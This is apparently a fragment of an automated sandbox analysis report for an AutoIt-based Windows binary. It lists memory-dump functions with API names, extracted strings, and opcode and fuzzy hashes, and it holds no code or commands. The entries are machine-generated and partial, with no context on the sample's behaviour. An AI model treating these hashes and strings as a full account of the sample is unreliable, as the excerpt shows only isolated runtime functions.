                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      • API String ID: 3215553584-1523873471
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _snwprintf
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3988819677-2584243854
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                      • String ID: $SysTabControl32
                                                                      • API String ID: 2080134422-3143400907
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Combobox
                                                                      • API String ID: 1025951953-2096851135
                                                                      • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                      • Instruction ID: 7e6a90e65f14efa1aa74edf06310556ef848458564452ff16fecfece871d0aaf
                                                                      • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                      • Instruction Fuzzy Hash: 57314A32A08781CAE770EF65B445B5AB7A1F785790F504239EAA993B99DF3CD841CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction ID: f91df47f6dbb8d77c121e35fab7d72b9440ab9767dd0ea3dea2bca1b71584da6
                                                                      • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                      • Instruction Fuzzy Hash: EF313836A0CB81CAE760EF15A44475AB7A1F785790F104235EAAC93B99DF3CD881CF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction ID: 6ed6d763414cfc78c288c6ef2747c4d44c538edf4916c2b6631f0ca5540554a6
                                                                      • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                      • Instruction Fuzzy Hash: 8B11CB36E1C68282EB51BB19E0013BD2261E780749F944135DA4DD7699EF3DD842D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction ID: 5a2ae3bdaa9609ec6accdd894763043206daf32bedb0adf270f46723e289c591
                                                                      • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                      • Instruction Fuzzy Hash: CE11B222A1DA8191FB10FB10E5521E96360FF89784F488431EA8CD7B8BFF2CD609DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$tan
                                                                      • API String ID: 3384550415-2428968949
                                                                      • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction ID: 279d46f398e57d0694e9cfa5b8b8e4afe51e6e88d858a6a4fab077cf17701f6a
                                                                      • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                      • Instruction Fuzzy Hash: 2C01D631A2DB8541DA14EF12A41133AA152FBDA7D4F105335E95E5BB89FF3CD0509B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$cos
                                                                      • API String ID: 3384550415-1949035351
                                                                      • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction ID: e9eb159599796041ab3de3180df3917ace2f74f310c6691eabe45915696bdb12
                                                                      • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                      • Instruction Fuzzy Hash: 80012832E1DB8981DA14EF22941133AA152BFDA7D4F105335E95E5ABC9FF3DD0505B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$sin
                                                                      • API String ID: 3384550415-1565623160
                                                                      • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction ID: df2126984ee99733bcc17300033f5cfcf1fca3b9da1675a6b2e2c490ba0047e2
                                                                      • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                      • Instruction Fuzzy Hash: 8E01B572E1DB8541DA14EF22941133AA262BF9A7D4F105335E95A5AB89FF6DD0405B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$exp
                                                                      • API String ID: 1757819995-2878093337
                                                                      • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction ID: 390a654600997eda41bba07db6b995666e0a98338e241c02ffce3dfa15d3c558
                                                                      • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                      • Instruction Fuzzy Hash: 3701C83692DB8887E220EF34D4466AA77B0FFEA744F205315E7452AA61DB7DD4C1DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction ID: eea1be16faf86eb80cd306fa4e49ac40f68d18ccec5861161e59d66d4517ebbc
                                                                      • Opcode Fuzzy Hash: 47289967b9eb923feb30cdf6953810302e06e8d280c3038f2442cbc3514d9180
                                                                      • Instruction Fuzzy Hash: 65F0E520B1C64642FB68B351B1433F92251AF88780F545431D91DE7BDBEDBCD4C5A700
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6439475E9
                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF643947241,?,?,?,?,00007FF64394660C,?,?,?,?,00007FF643944CD3), ref: 00007FF643947600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction ID: 8c1cc5d2687f3a90a2c179c5c14a5775797ad15ff82986a40fede04a0bb2796c
                                                                      • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                      • Instruction Fuzzy Hash: DEE09B62A0C54681FA457B55F4034F52362EF58B91F984035D92DE735BEE3CE444D710
                                                                      APIs
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF643945629
                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF64394563A
                                                                        • Part of subcall function 00007FF643947018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64394563F), ref: 00007FF64394708D
                                                                        • Part of subcall function 00007FF643947018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64394563F), ref: 00007FF6439470BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3561508498-410509341
                                                                      • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction ID: 5a6fb196d143c36eba2a07fa6ac8acfa05896edc9396ed3b28bfc72b73b42220
                                                                      • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                      • Instruction Fuzzy Hash: D0D05B2261C54691DE10FF04D4423A46330F751308FD04431D15CD25B6FF3CD64AE700